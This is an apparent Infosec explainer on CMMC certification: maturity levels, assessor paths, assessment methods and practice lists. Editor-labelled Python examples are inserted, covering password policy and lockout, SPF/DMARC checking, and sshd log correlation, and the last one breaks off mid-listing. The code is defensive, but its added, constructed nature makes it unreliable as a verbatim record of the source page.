Cybersecurity Maturity Model Certification (CMMC)

Everything you need to know about assessments, assessors and getting certified


What is the CMMC framework?

The Department of Defense (DoD) supply chain and the Defense Industrial Base (DIB) it supports are continuously under threat from malicious actors. The theft of Federal Contract Information (FCI) and Controlled Unclassified Information (CUI) doesn't just stifle innovation and undercut U.S. technical advantages; it significantly increases the risk to national security.

To reduce this risk, the DoD released the CMMC framework, which is intended to assess and enhance the cybersecurity posture of the more than 300,000 companies that contribute towards the research, engineering, development, acquisition, production, delivery, sustainment and operation of DoD systems, networks, installations, capabilities and services.

Inside the CMMC requirements

Although the CMMC framework is new, many of the security requirements within it are not. Of the 171 practices included in CMMC, 110 of them are specified in NIST SP 800-171 Rev. 2. Additional practices and processes are drawn from other standards, references and sources, such as:

» NIST SP 800-53

» Aerospace Industries Association (AIA) National Aerospace Standard (NAS) 9933 “Critical Security Controls for Effective Capability in Cyber Defense”

» Computer Emergency Response Team (CERT) Resilience Management Model (RMM) v1.2

CMMC builds upon existing regulation (DFARS 252.204-7012) by adding a certification program to verify the implementation of processes and practices across five cybersecurity maturity levels.

Pre-Register: Become a CMMC Certified Professional!


CMMC timeline: when will you be affected?

[Timeline graphic. The date labels on the graphic (JAN 2020, AUG 2020, SEPT 2020, JAN 2021, APR 2021, OCT 2021, DEC 2021, JAN 2022, 2022-2025 and TBD) cannot be matched to individual milestones from the extracted text. The milestones shown are:]

» CMMC version 1.0 released
» CMMC Accreditation Body (CMMC-AB) selects 72 candidates for the Provisional Assessor program
» CMMC exam development begins
» Infosec approved as one of the first CMMC-AB Licensed Partner Publishers (LPP)
» Infosec approved as one of the first CMMC-AB Licensed Training Providers (LTP)
» Infosec launches Certified CMMC Professional (CCP) training
» Beta versions of the CCP, CCA-1 and CCA-3 exams available
» First Certified CMMC Instructors (CCI) start training
» Full release of the CCP, CCA-1 and CCA-3 exams
» Infosec launches Certified CMMC Assessor Level 1 (CCA-1) training
» Infosec launches Certified CMMC Assessor Level 3 (CCA-3) training
» Beta version of the CCA-5 exam available
» Infosec launches Certified CMMC Assessor Level 5 (CCA-5) training
» Phased rollout continues until all DoD contracts require CMMC certification (2022-2025)


Understanding the 5 CMMC maturity levels

The CMMC framework contains five maturity levels, with Level 5 being the highest. The processes and practices required for each level are aligned around:

» Level 1: Safeguarding Federal Contract Information (FCI)

» Level 2: Transitioning towards protecting Controlled Unclassified Information (CUI)

» Level 3: Protecting CUI

» Levels 4-5: Protecting CUI and reducing the risk of Advanced Persistent Threats (APTs)

Organizations must demonstrate both the institutionalization of processes and the implementation of practices to achieve a certification level. For example, if an organization demonstrates Level 3 practices but only Level 2 processes, they will be classified overall as Level 2.

CMMC by the numbers

Graphic adapted from CMMC-AB.

Level    Processes    Practices                    Count
Level 1  Performed    Basic cyber hygiene          0 processes, 17 practices
Level 2  Documented   Intermediate cyber hygiene   2 processes, 55 practices
Level 3  Managed      Good cyber hygiene           1 process, 58 practices
Level 4  Reviewed     Proactive                    1 process, 26 practices
Level 5  Optimizing   Advanced / progressive       1 process, 15 practices

CMMC levels are cumulative. To achieve Level 5, an organization must demonstrate all 5 processes and 171 practices included in the framework. The 171 practices are spread across 17 domains (e.g., access control, incident response).


Certified CMMC Professional (CCP)

The Certified CMMC Professional (CCP) is the first step in the CMMC career path. In addition to being a prerequisite for Certified CMMC Assessor (CCA) or Certified CMMC Instructor (CCI), it also certifies you as a valuable resource for consulting agencies, CMMC Third-Party Assessor Organizations (C3PAOs) and organizations needing CMMC support and guidance.

CCP requirements

» College degree in a technical field or other equivalent experience (including military), or at least two years in cyber or information technology
» Get CMMC-AB approval of your submitted application
» Complete CCP training from an LTP (Licensed Training Provider), such as Infosec

CCP benefits

» Participate as an assessment team member under the supervision of a CCA
» Work towards becoming a CCA or CCI
» Validate your training and understanding of the CMMC for clients and employers
» Use the CCP logo and be listed in the CMMC-AB Marketplace

Check out our Certified CMMC Professional training page to learn more.

How to become a Certified CMMC Professional

1. Verify you meet the prerequisites
2. Apply online to become a CCP
3. Get your application evaluated and approved
4. Attend CCP training from a Licensed Training Provider
5. Take and pass the CCP exam
6. Sign the code of professional conduct
7. Become a Certified CMMC Professional (CCP)


Certified CMMC Assessor (CCA)

Certified CMMC Professionals (CCP) can apply to become a Certified CMMC Assessor Level 1 (CCA-1), the first of three assessor levels (1, 3, 5) on the CMMC Assessor career path:

1. Certified CMMC Assessor Level 1 (CCA-1)

2. Certified CMMC Assessor Level 3 (CCA-3)

3. Certified CMMC Assessor Level 5 (CCA-5)

CCA-1 requirements

» Earn your CCP

» Be a U.S. Person (Green card is acceptable); U.S. citizenship is required to participate as a team member on maturity level 2 (ML-2) assessments

» Have or gain a favorably adjudicated Tier 3 background check; or possess a NAC (National Agency Check), DHS Suitability credential or other DoD accepted clearance (required to participate on ML-2 or higher assessment teams)

CCA-1 benefits

» Conduct CMMC maturity level 1 (ML-1) assessments

» Supervise CCPs in the conduct of ML-1 assessments

» After completing 3 assessments

» Use the CMMC CCA-1 logo

» Get listed in the CMMC-AB Marketplace

Check out our Certified CMMC Assessor Level 1 (CCA-1) training page to learn more.

How to become a Certified CMMC Assessor Level 1

1. Verify you meet the prerequisites
2. Apply online to become a CCA-1
3. Pass a background check (or meet the other requirements listed above)
4. Attend CCA-1 training from a Licensed Training Provider
5. Take and pass the CCA-1 exam
6. Pay the CCA-1 annual certification fee and sign the license agreement
7. Schedule CMMC-AB staff to observe your first assessment
8. Conduct your first assessment (under contract with a C3PAO)
9. CMMC-AB observer reports on your performance
10. Become a Certified CMMC Assessor Level 1 (CCA-1)


Organizations seeking certification (OSC)

CMMC is being incorporated into the Defense Federal Acquisition Regulation Supplement (DFARS), and by 2025 all suppliers will need a certification in order to bid on contracts. Contractors can achieve a CMMC level for their entire enterprise network or for a particular segment or enclave, depending on where the protected information is handled and stored. CMMC-AB estimates the certification process will take at least six months.

How to get your organization CMMC certified

1. Identify scope (organization, segment or enclave)
2. Identify the maturity level needed to bid on the contracts you want
3. Pre-assess using a Registered Provider Organization (RPO) or CMMC Third-Party Assessor Organization (C3PAO) (optional)
4. Close any identified gaps
5. Schedule and complete an assessment with a C3PAO
6. Resolve any findings within 90 days
7. CMMC-AB reviews the submitted assessment
8. If approved, receive a 3-year CMMC certification

Want to learn more about CMMC?

Enroll in Infosec's Certified CMMC Professional (CCP) Boot Camp to get a comprehensive overview of the CMMC requirements as well as practical recommendations and tools for achieving CMMC certification for your organization.

Keep an eye on the Infosec CMMC page for the latest CMMC updates, announcements and training resources, and be one of the first organizations to get certified!


CMMC resources

The CMMC assessment process is outlined in guides available on the Office of the Under Secretary of Defense for Acquisition & Sustainment (OUSD(A&S)) website:

» CMMC Level 1 Assessment Guide (editable)

» CMMC Level 3 Assessment Guide (editable)

» CMMC Level 5 Assessment Guide (coming soon)

Other resources

» CMMC Model v1.02, its appendices and appendices in tabular form

» CMMC Model Errata v1.0

» CMMC Glossary (editable)

CMMC assessment overview

Certification provides assurance of practices and processes

Certified Assessors use the same assessment methods for each contractor. Once a contractor is assessed and certified at a level, other entities (e.g., government sponsors and prime contractors looking to hire subcontractors) have assurance that the certified contractor meets CMMC practices and processes.

Methodology is the same regardless of size

The CMMC assessment methodology follows a data-centric security process that applies the practices equally, regardless of the contractor's size, constraints or complexity. All CMMC levels are achievable by small, medium and large contractors.

Assessment scope is pre-determined by the OSC and C3PAO

Prior to a CMMC assessment, the contractor must define the scope for the assessment, which represents the boundary for which the CMMC certificate will be issued. Additional guidance on assessment scope will be available in the next version of the CMMC Assessment Guides.


CMMC assessment criteria and methodology

The CMMC assessment procedure is defined in NIST SP 800-171A Section 2.11 and includes:

» Assessment objects: the things a Certified Assessor will investigate
» Assessment actions: how the Certified Assessor will investigate those objects
» Assessment objectives: the determination statements related to the CMMC practice or process being assessed

CMMC assessment objects

» Specifications: document-based artifacts (e.g., policies, procedures, security plans, security requirements, functional specifications, architectural designs) associated with a system.
» Mechanisms: the specific hardware, software or firmware safeguards employed within a system.
» Activities: the protection-related actions supporting a system that involve people (e.g., conducting system backup operations, exercising a contingency plan and monitoring network traffic).
» Individuals (or groups of individuals): the people applying the specifications, mechanisms or activities described above.


CMMC assessment actions

Certified Assessors must select at least two of the three following actions as they collect evidence for each assessment objective:

» Interviews tell the Certified Assessor what the contractor staff believe to be true.
» Documentation provides evidence of intent.
» Testing demonstrates what has or has not been done.

Interview

The Certified Assessor has discussions with individuals within an organization to understand if a practice or process has been addressed. Interviews of applicable staff (possibly at different organizational levels) determine if:

» CMMC practices or processes are implemented
» Adequate resourcing, training and planning have occurred for individuals to perform the practices

Examine

The Certified Assessor can review, inspect, observe, study or analyze assessment objects (documents, mechanisms or activities). Documents need to be in their final form (drafts are not eligible) and include:

» Policy, process and procedure documents
» Training materials
» Plans and planning documents
» System-level, network and data flow diagrams

Test

The Certified Assessor will determine which practices, or objectives within a practice, need demonstration or testing. Not all practices will require testing. For example:

» Contractor staff may talk about how users are identified (interview)
» Documentation may provide details on how users are identified (examine)
» Seeing a demonstration of identifying users provides evidence that the practice is met (test)


Inherited practicesA contractor can inherit practice or process objectives. A practice or process objective that is inherited is met because adequate evidence is provided that the enterprise or another entity, such as an External Service Provider (ESP), performs the practice or process objective.

For each practice or process objective that is inherited, the Certified Assessor includes statements that indicate how they were evaluated and from whom they are inherited.

If the contractor cannot demonstrate adequate evidence for all assessment objectives, through either contractor evidence or evidence of inheritance, the contractor will receive a NOT MET for the practice or process.

Assessment findings

The assessment of a CMMC practice or process results in one of three possible findings: MET, NOT MET or NOT APPLICABLE.

MET: The contractor successfully meets the practice or process. For each practice or process marked MET, the Certified Assessor includes statements that indicate the response conforms to the objectives and documents the appropriate evidence to support the response.

NOT MET: The contractor has not met the practice or process. For each practice or process marked NOT MET, the Certified Assessor includes statements that explain why and documents the appropriate evidence that the contractor does not conform to the objectives.

NOT APPLICABLE (N/A): The practice or process does not apply. For each practice or process marked N/A, the Certified Assessor includes a statement that explains why the practice or process does not apply to the contractor. For example, SC.1.176 (implement subnetworks for publicly accessible system components) might be N/A if there are no publicly accessible systems.


CMMC Level 1

Processes: Performed

Level 1 requires that an organization performs the specified practices. Because the organization may only be able to perform these practices in an ad-hoc manner and may or may not rely on documentation, process maturity is not assessed for Level 1.

Practices: Basic cyber hygiene

Level 1 focuses on the protection of FCI and consists only of practices that correspond to the basic safeguarding requirements specified in 48 CFR 52.204-21 ("Basic Safeguarding of Covered Contractor Information Systems").

Level 1 practices

Access control
» Limit information system access to authorized users, processes acting on behalf of authorized users or devices (including other information systems).
» Limit information system access to the types of transactions and functions that authorized users are permitted to execute.
» Verify and control/limit connections to and use of external information systems.
» Control information posted or processed on publicly accessible information systems.

Identification and authentication
» Identify information system users, processes acting on behalf of users or devices.
» Authenticate (or verify) the identities of those users, processes or devices, as a prerequisite to allowing access to organizational information systems.

Media protection
» Sanitize or destroy information system media containing Federal Contract Information before disposal or release for reuse.

Physical protection
» Limit physical access to organizational information systems, equipment and the respective operating environments to authorized individuals.
» Escort visitors and monitor visitor activity.
» Maintain audit logs of physical access.
» Control and manage physical access devices.

System and communications protection
» Monitor, control and protect organizational communications (i.e., information transmitted or received by organizational information systems) at the external boundaries and key internal boundaries of the information systems.
» Implement subnetworks for publicly accessible system components that are physically or logically separated from internal networks.

System and information integrity
» Identify, report and correct information and information system flaws in a timely manner.
» Provide protection from malicious code at appropriate locations within organizational information systems.
» Update malicious code protection mechanisms when new releases are available.
» Perform periodic scans of the information system and real-time scans of files from external sources as files are downloaded, opened or executed.


CMMC Level 2

Processes: Documented

Level 2 requires that an organization establish and document practices and policies to guide the implementation of its CMMC efforts. The documentation of practices enables individuals to perform them in a repeatable manner. Organizations develop mature capabilities by documenting their processes and then practicing them as documented.

Practices: Intermediate cyber hygiene

Level 2 serves as a progression from Level 1 to Level 3 and consists of a subset of the security requirements specified in NIST SP 800-171 as well as practices from other standards and references. Because this level represents a transitional stage, a subset of practices reference the protection of CUI.

Level 2 practices

Access control
» Provide privacy and security notices consistent with applicable CUI rules.
» Limit use of portable storage devices on external systems.
» Employ the principle of least privilege, including for specific security functions and privileged accounts.
» Use non-privileged accounts or roles when accessing nonsecurity functions.
» Limit unsuccessful logon attempts.
» Use session lock with pattern-hiding displays to prevent access and viewing of data after a period of inactivity.
» Authorize wireless access prior to allowing such connections.
» Monitor and control remote access sessions.
» Route remote access via managed access control points.
» Control the flow of CUI in accordance with approved authorizations.

Audit and accountability
» Ensure that the actions of individual system users can be uniquely traced to those users so they can be held accountable for their actions.
» Create and retain system audit logs and records to the extent needed to enable the monitoring, analysis, investigation and reporting of unlawful or unauthorized system activity.
» Provide a system capability that compares and synchronizes internal system clocks with an authoritative source to generate time stamps for audit records.
» Review audit logs.

Awareness and training
» Ensure that managers, system administrators and users of organizational systems are made aware of the security risks associated with their activities and of the applicable policies, standards and procedures related to the security of those systems.
» Ensure that personnel are trained to carry out their assigned information security-related duties and responsibilities.

Configuration management
» Establish and maintain baseline configurations and inventories of organizational systems (including hardware, software, firmware and documentation) throughout the respective system development life cycles.
» Employ the principle of least functionality by configuring organizational systems to provide only essential capabilities.
» Control and monitor user-installed software.
» Establish and enforce security configuration settings for information technology products employed in organizational systems.
» Track, review, approve or disapprove, and log changes to organizational systems.
» Analyze the security impact of changes prior to implementation.

Identification and authentication
» Enforce a minimum password complexity and change of characters when new passwords are created.
» Prohibit password reuse for a specified number of generations.
» Allow temporary password use for system logons with an immediate change to a permanent password.
» Store and transmit only cryptographically-protected passwords.
» Obscure feedback of authentication information.
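The Level 2 identification and authentication practices above (minimum complexity with changed characters, no reuse for a number of generations, temporary passwords replaced at first logon, cryptographically protected storage, obscured feedback) together with the Level 2 access control practice of limiting unsuccessful logon attempts are all decisions made inside one authentication path. The following is an added example of that path in Python, written for this page; it is not code from Infosec, the CMMC-AB or any CMMC publication. The policy values (12-character minimum, three character classes, four changed characters, five-generation history, five failed attempts, PBKDF2 iteration count) are assumptions standing in for an organization's own settings, and the practice identifiers in the comments refer to CMMC v1.02 numbering.

```python
"""Authentication path illustrating CMMC Level 2 IA/AC practices.

Added example, not code from the page, Infosec or CMMC. Policy values
below are assumptions standing in for an organization's own settings.
"""
from __future__ import annotations

import hashlib
import hmac
import os
import re
from dataclasses import dataclass, field

PBKDF2_ITERATIONS = 210_000   # assumption; tune upward to the hardware budget in production
MAX_FAILED_ATTEMPTS = 5       # AC.2.009: limit unsuccessful logon attempts
PASSWORD_HISTORY = 5          # IA.2.079: prohibit reuse for N generations
MIN_LENGTH = 12               # IA.2.078: minimum complexity (assumed policy)
MIN_CLASSES = 3               # IA.2.078: character classes required (assumed policy)
MIN_CHANGED = 4               # IA.2.078: characters that must differ from the old password
# One message for every rejection, so the response never says which check failed
# (IA.2.082: obscure feedback of authentication information).
GENERIC_FAILURE = "Authentication failed"


def hash_password(password: str, salt: bytes | None = None) -> tuple[bytes, bytes]:
    """IA.2.081: keep only a salted PBKDF2-HMAC-SHA256 digest, never the password."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt, digest


def meets_complexity(password: str, previous: str | None = None) -> bool:
    """IA.2.078: length, character classes, and enough characters changed."""
    classes = (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]")
    if len(password) < MIN_LENGTH:
        return False
    if sum(1 for c in classes if re.search(c, password)) < MIN_CLASSES:
        return False
    if previous is not None:
        # Simple positional difference count; a real policy would define its own measure.
        changed = sum(1 for a, b in zip(password, previous) if a != b)
        changed += abs(len(password) - len(previous))
        if changed < MIN_CHANGED:
            return False
    return True


@dataclass
class Account:
    salt: bytes
    digest: bytes
    history: list[tuple[bytes, bytes]] = field(default_factory=list)  # older (salt, digest) pairs
    failed_attempts: int = 0
    locked: bool = False
    must_change: bool = False  # IA.2.080: temporary password, must be replaced at first logon


class AuthStore:
    def __init__(self) -> None:
        self._accounts: dict[str, Account] = {}

    def create(self, user: str, temporary_password: str) -> None:
        salt, digest = hash_password(temporary_password)
        self._accounts[user] = Account(salt, digest, must_change=True)

    @staticmethod
    def _matches(password: str, salt: bytes, digest: bytes) -> bool:
        _, candidate = hash_password(password, salt)
        return hmac.compare_digest(candidate, digest)  # constant-time comparison

    def change_password(self, user: str, old: str, new: str) -> bool:
        acct = self._accounts[user]
        if not self._matches(old, acct.salt, acct.digest):
            return False
        if not meets_complexity(new, previous=old):
            return False
        # IA.2.079: the new password may not match the current one or any kept generation.
        for salt, digest in [(acct.salt, acct.digest)] + acct.history:
            if self._matches(new, salt, digest):
                return False
        acct.history = ([(acct.salt, acct.digest)] + acct.history)[: PASSWORD_HISTORY - 1]
        acct.salt, acct.digest = hash_password(new)
        acct.must_change = False
        return True

    def login(self, user: str, password: str) -> tuple[bool, str]:
        """Returns (success, message); every rejection before authentication is GENERIC_FAILURE."""
        acct = self._accounts.get(user)
        if acct is None:
            hash_password(password)  # spend the same time as a real check so timing does not reveal users
            return False, GENERIC_FAILURE
        if acct.locked:
            return False, GENERIC_FAILURE
        if not self._matches(password, acct.salt, acct.digest):
            acct.failed_attempts += 1
            if acct.failed_attempts >= MAX_FAILED_ATTEMPTS:
                acct.locked = True  # AC.2.009: lock at the limit; unlocking is an administrative action
            return False, GENERIC_FAILURE
        acct.failed_attempts = 0
        if acct.must_change:
            return False, "Password change required"  # caller has already proven the password
        return True, "OK"

    def is_locked(self, user: str) -> bool:
        return self._accounts[user].locked
```

An assessor testing these practices would expect to see exactly this behaviour from the live system rather than from a policy document: a wrong password, a locked account and an unknown user all produce the same response, a temporary password cannot be used for anything except changing itself, and a previously used password is refused without the system ever holding it in clear text.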

Incident response
» Establish an operational incident-handling capability for organizational systems that includes preparation, detection, analysis, containment, recovery and user response activities.
» Detect and report events.
» Analyze and triage events to support event resolution and incident declaration.
» Develop and implement responses to declared incidents according to pre-defined procedures.
» Perform root cause analysis on incidents to determine underlying causes.

Maintenance
» Perform maintenance on organizational systems.
» Provide controls on the tools, techniques, mechanisms and personnel used to conduct system maintenance.
» Require multifactor authentication to establish nonlocal maintenance sessions via external network connections and terminate such connections when nonlocal maintenance is complete.
» Supervise the maintenance activities of personnel without required access authorization.

Media protection
» Protect (i.e., physically control and securely store) system media containing CUI, both paper and digital.
» Limit access to CUI on system media to authorized users.
» Control the use of removable media on system components.

Personnel security
» Screen individuals prior to authorizing access to organizational systems containing CUI.
» Ensure that organizational systems containing CUI are protected during and after personnel actions such as terminations and transfers.

Physical protection
» Protect and monitor the physical facility and support infrastructure for organizational systems.

Recovery
» Regularly perform and test data back-ups.
» Protect the confidentiality of backup CUI at storage locations.

Risk management
» Periodically assess the risk to organizational operations (including mission, functions, image or reputation), organizational assets and individuals, resulting from the operation of organizational systems and the associated processing, storage or transmission of CUI.
» Scan for vulnerabilities in organizational systems and applications periodically and when new vulnerabilities affecting those systems and applications are identified.
» Remediate vulnerabilities in accordance with risk assessments.

Security assessment
» Develop, document and periodically update system security plans that describe system boundaries, system environments of operation, how security requirements are implemented, and the relationships with or connections to other systems.
» Periodically assess the security controls in organizational systems to determine if the controls are effective in their application.
» Develop and implement plans of action designed to correct deficiencies and reduce or eliminate vulnerabilities in organizational systems.

System and communications protection
» Prohibit remote activation of collaborative computing devices and provide indication of devices in use to users present at the device.
» Use encrypted sessions for the management of network devices.

System and information integrity
» Monitor system security alerts and advisories and take action in response.
» Monitor organizational systems, including inbound and outbound communications traffic, to detect attacks and indicators of potential attacks.
» Identify unauthorized use of organizational systems.


CMMC Level 3

Processes: Managed

Level 3 requires that an organization establish, maintain and resource a plan demonstrating the management of activities for practice implementation. The plan may include information on missions, goals, project plans, resourcing, required training and involvement of relevant stakeholders.

Practices: Good cyber hygiene

Level 3 focuses on the protection of CUI and encompasses all of the security requirements specified in NIST SP 800-171 as well as additional practices from other standards and references to mitigate threats. Note that DFARS clause 252.204-7012 ("Safeguarding of Covered Defense Information and Cyber Incident Reporting") specifies additional requirements beyond the NIST SP 800-171 security requirements, such as incident reporting.

Level 3 practices

Access control
» Separate the duties of individuals to reduce the risk of malevolent activity without collusion.
» Prevent non-privileged users from executing privileged functions and capture the execution of such functions in audit logs.
» Terminate (automatically) user sessions after a defined condition.
» Protect wireless access using authentication and encryption.
» Control connection of mobile devices.
» Employ cryptographic mechanisms to protect the confidentiality of remote access sessions.
» Authorize remote execution of privileged commands and remote access to security-relevant information.
» Encrypt CUI on mobile devices and mobile computing platforms.

Asset management
» Define procedures for the handling of CUI data.

Audit and accountability
» Review and update logged events.
» Alert in the event of an audit logging process failure.
» Collect audit information (e.g., logs) into one or more central repositories.
» Protect audit information and audit logging tools from unauthorized access, modification and deletion.
» Limit management of audit logging functionality to a subset of privileged users.
» Correlate audit record review, analysis and reporting processes for investigation and response to indications of unlawful, unauthorized, suspicious or unusual activity.
» Provide audit record reduction and report generation to support on-demand analysis and reporting.

Awareness and training
» Provide security awareness training on recognizing and reporting potential indicators of insider threat.

Configuration management
» Define, document, approve and enforce physical and logical access restrictions associated with changes to organizational systems.
» Restrict, disable or prevent the use of nonessential programs, functions, ports, protocols and services.
» Apply a deny-by-exception (blacklisting) policy to prevent the use of unauthorized software or a deny-all, permit-by-exception (whitelisting) policy to allow the execution of authorized software.

Identification and authentication
» Use multifactor authentication for local and network access to privileged accounts and for network access to non-privileged accounts.
» Employ replay-resistant authentication mechanisms for network access to privileged and non-privileged accounts.
» Prevent the reuse of identifiers for a defined period.
» Disable identifiers after a defined period of inactivity.

Incident response
» Track, document and report incidents to designated officials and/or authorities both internal and external to the organization.
» Test the organizational incident response capability.

Maintenance
» Ensure equipment removed for off-site maintenance is sanitized of any CUI.
» Check media containing diagnostic and test programs for malicious code before the media are used in organizational systems.

Media protection
» Mark media with necessary CUI markings and distribution limitations.
» Prohibit the use of portable storage devices when such devices have no identifiable owner.
» Control access to media containing CUI and maintain accountability for media during transport outside of controlled areas.
» Implement cryptographic mechanisms to protect the confidentiality of CUI stored on digital media during transport unless otherwise protected by alternative physical safeguards.

Physical protection
» Enforce safeguarding measures for CUI at alternate work sites.

Recovery
» Regularly perform complete, comprehensive and resilient data back-ups as organizationally defined.

Risk management
» Periodically perform risk assessments to identify and prioritize risks according to the defined risk categories, risk sources and risk measurement criteria.
» Develop and implement risk mitigation plans.
» Manage non-vendor-supported products (e.g., end of life) separately and restrict as necessary to reduce risk.

Security assessment
» Monitor security controls on an ongoing basis to ensure the continued effectiveness of the controls.
» Employ a security assessment of enterprise software that has been developed internally, for internal use, and that has been organizationally defined as an area of risk.

Situational awareness
» Receive and respond to cyber threat intelligence from information sharing forums and sources and communicate to stakeholders.

System and communications protection
» Employ FIPS-validated cryptography when used to protect the confidentiality of CUI.
» Employ architectural designs, software development techniques and systems engineering principles that promote effective information security within organizational systems.
» Separate user functionality from system management functionality.
» Prevent unauthorized and unintended information transfer via shared system resources.
» Deny network communications traffic by default and allow network communications traffic by exception (i.e., deny all, permit by exception).
» Prevent remote devices from simultaneously establishing non-remote connections with organizational systems and communicating via some other connection to resources in external networks (i.e., split tunneling).
» Implement cryptographic mechanisms to prevent unauthorized disclosure of CUI during transmission unless otherwise protected by alternative physical safeguards.
» Terminate network connections associated with communications sessions at the end of the sessions or after a defined period of inactivity.
» Establish and manage cryptographic keys for cryptography employed in organizational systems.
» Control and monitor the use of mobile code.
» Control and monitor the use of Voice over Internet Protocol (VoIP) technologies.
» Protect the authenticity of communications sessions.
» Protect the confidentiality of CUI at rest.
» Implement Domain Name System (DNS) filtering services.
» Implement a policy restricting the publication of CUI on externally owned, publicly accessible websites (e.g., forums, LinkedIn, Facebook, Twitter).

System and information integrity
» Employ spam protection mechanisms at information system access entry and exit points.
» Implement email forgery protections.
» Utilize sandboxing to detect or block potentially malicious email.
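The "email forgery protections" practice above is normally met with SPF, DKIM and DMARC, and an assessor's test of it starts with the domain's public DNS records. The following added example, written for this page and not taken from Infosec or the CMMC guides, parses SPF and DMARC records and reports the weaknesses a practitioner looks for: a missing or duplicated SPF record, a non-enforcing `all` term, the deprecated `ptr` mechanism, more DNS-lookup terms than RFC 7208 allows, a DMARC policy still at `p=none`, partial enforcement via `pct`, and no `rua` reporting address. The domains and records are constructed, and the lookup is injected as a function so the block runs offline; in use, `lookup_txt` would wrap a real TXT query.

```python
"""SPF and DMARC record checks behind the "email forgery protections" practice.

Added example, not code from the page, Infosec or CMMC. DNS is replaced by an
injected lookup function over constructed records so the block runs offline.
"""
from __future__ import annotations

import re

# Mechanisms and modifiers that each cost a DNS lookup under the RFC 7208 limit of 10.
LOOKUP_TERM = re.compile(r"^[+\-~?]?(include:|exists:|redirect=|a(?=$|[:/])|mx(?=$|[:/])|ptr)", re.I)


def parse_spf(record):
    """Return (terms, all_qualifier) for a v=spf1 record, or None if it is not SPF."""
    parts = record.split()
    if not parts or parts[0].lower() != "v=spf1":
        return None
    terms, all_qualifier = [], None
    for term in parts[1:]:
        qualifier = term[0] if term[0] in "+-~?" else "+"  # RFC 7208: "+" is the default
        if term.lstrip("+-~?").lower() == "all":
            all_qualifier = qualifier
        else:
            terms.append(term)
    return terms, all_qualifier


def parse_dmarc(record):
    """Return the tag=value map of a v=DMARC1 record, or None if it is not DMARC."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags if tags.get("v", "").upper() == "DMARC1" else None


def assess_domain(domain, lookup_txt):
    """lookup_txt(name) -> list of TXT strings. Returns findings; an empty list means no gaps found."""
    findings = []
    spf_records = [r for r in lookup_txt(domain) if r.lower().startswith("v=spf1")]
    if len(spf_records) != 1:
        findings.append(f"SPF: exactly one v=spf1 record is required, found {len(spf_records)}")
    else:
        terms, all_q = parse_spf(spf_records[0])
        if all_q == "+":
            findings.append("SPF: '+all' authorizes every sender on the internet; use '-all'")
        elif all_q in (None, "?"):
            findings.append("SPF: no enforcing 'all' term; end the record with '-all'")
        elif all_q == "~":
            findings.append("SPF: '~all' only softfails; move to '-all' once DMARC reports are clean")
        if any(t.lstrip("+-~?").lower().startswith("ptr") for t in terms):
            findings.append("SPF: 'ptr' mechanism is deprecated (RFC 7208); remove it")
        if sum(1 for t in terms if LOOKUP_TERM.match(t)) > 10:
            findings.append("SPF: more than 10 DNS-lookup terms; receivers will return permerror")
    dmarc = None
    for r in lookup_txt("_dmarc." + domain):
        dmarc = dmarc or parse_dmarc(r)
    if dmarc is None:
        findings.append(f"DMARC: no v=DMARC1 record at _dmarc.{domain}")
    else:
        policy = dmarc.get("p", "").lower()
        if policy == "none":
            findings.append("DMARC: p=none only monitors; move to p=quarantine, then p=reject")
        elif policy not in ("quarantine", "reject"):
            findings.append("DMARC: missing or invalid p= tag")
        if dmarc.get("pct", "100") != "100":  # RFC 7489: pct defaults to 100
            findings.append(f"DMARC: pct={dmarc['pct']} leaves part of the forged mail unenforced")
        if "rua" not in dmarc:
            findings.append("DMARC: no rua= address, so forgery attempts are never reported")
    return findings


# Constructed records for example-style domains (not real DNS data).
CONSTRUCTED_DNS = {
    "strong.example": ["v=spf1 ip4:192.0.2.0/24 include:_spf.mail.example -all"],
    "_dmarc.strong.example": ["v=DMARC1; p=reject; rua=mailto:dmarc@strong.example; adkim=s; aspf=s"],
    "weak.example": ["v=spf1 include:_spf.mail.example ptr ~all", "site-verification=abc123"],
    "_dmarc.weak.example": ["v=DMARC1; p=none; pct=50"],
    "none.example": [],
}


def constructed_lookup(name):
    return CONSTRUCTED_DNS.get(name, [])


if __name__ == "__main__":
    for d in ("strong.example", "weak.example", "none.example"):
        print(d, assess_domain(d, constructed_lookup) or ["no findings"])
```

DKIM is deliberately absent from the check: DKIM public keys live at `<selector>._domainkey.<domain>`, so they cannot be found from the domain name alone, and the assessor needs the selector names from the mail administrator before that part of the practice can be examined.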


CMMC Level 4

Processes: Reviewed

Level 4 requires that an organization review and measure practices for effectiveness. In addition to measuring practices for effectiveness, organizations at this level are able to take corrective action when necessary and inform higher-level management of status or issues on a recurring basis.

Practices: Proactive

Level 4 focuses on the protection of CUI from APTs and encompasses a subset of the enhanced security requirements from Draft NIST SP 800-171B as well as other cybersecurity best practices. These practices enhance the detection and response capabilities of an organization to address and adapt to the changing tactics, techniques and procedures (TTPs) used by APTs.

Level 4 practices

Access control
» Control information flows between security domains on connected systems.
» Periodically review and update CUI program access permissions.
» Restrict remote network access based on organizationally defined risk factors such as time of day, location of access, physical location, network connection state and measured properties of the current user and role.

Asset management
» Employ a capability to discover and identify systems with specific component attributes (e.g., firmware level, OS type) within your inventory.

Audit and accountability
» Automate analysis of audit logs to identify and act on critical indicators (TTPs) and/or organizationally defined suspicious activity.
» Review audit information for broad activity in addition to per-machine activity.
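The two audit practices above are related: a per-machine threshold misses an adversary who spreads a handful of attempts across many hosts. As an added example (written for this page, not Infosec's code nor part of the CMMC model), the Python below parses constructed sshd syslog lines and runs both views over them: a per-host brute-force count, which finds nothing in the sample, and a fleet-wide correlation by source IP, which flags the spray and the success that follows it. The log lines, thresholds and indicator names are all illustrative.

```python
"""Automated audit-log analysis: per-machine thresholds versus fleet-wide correlation.

Added example. SAMPLE_LOGS holds constructed sshd syslog lines, not records from
a real system; thresholds are illustrative and would be tuned per environment.
"""
import re
from collections import Counter, defaultdict

SAMPLE_LOGS = """\
Mar 10 09:00:01 web01 sshd[1201]: Failed password for admin from 198.51.100.7 port 51001 ssh2
Mar 10 09:00:03 web01 sshd[1201]: Failed password for admin from 198.51.100.7 port 51002 ssh2
Mar 10 09:00:05 web02 sshd[2201]: Failed password for admin from 198.51.100.7 port 51003 ssh2
Mar 10 09:00:07 db01 sshd[3301]: Failed password for root from 198.51.100.7 port 51004 ssh2
Mar 10 09:00:09 db01 sshd[3301]: Failed password for admin from 198.51.100.7 port 51005 ssh2
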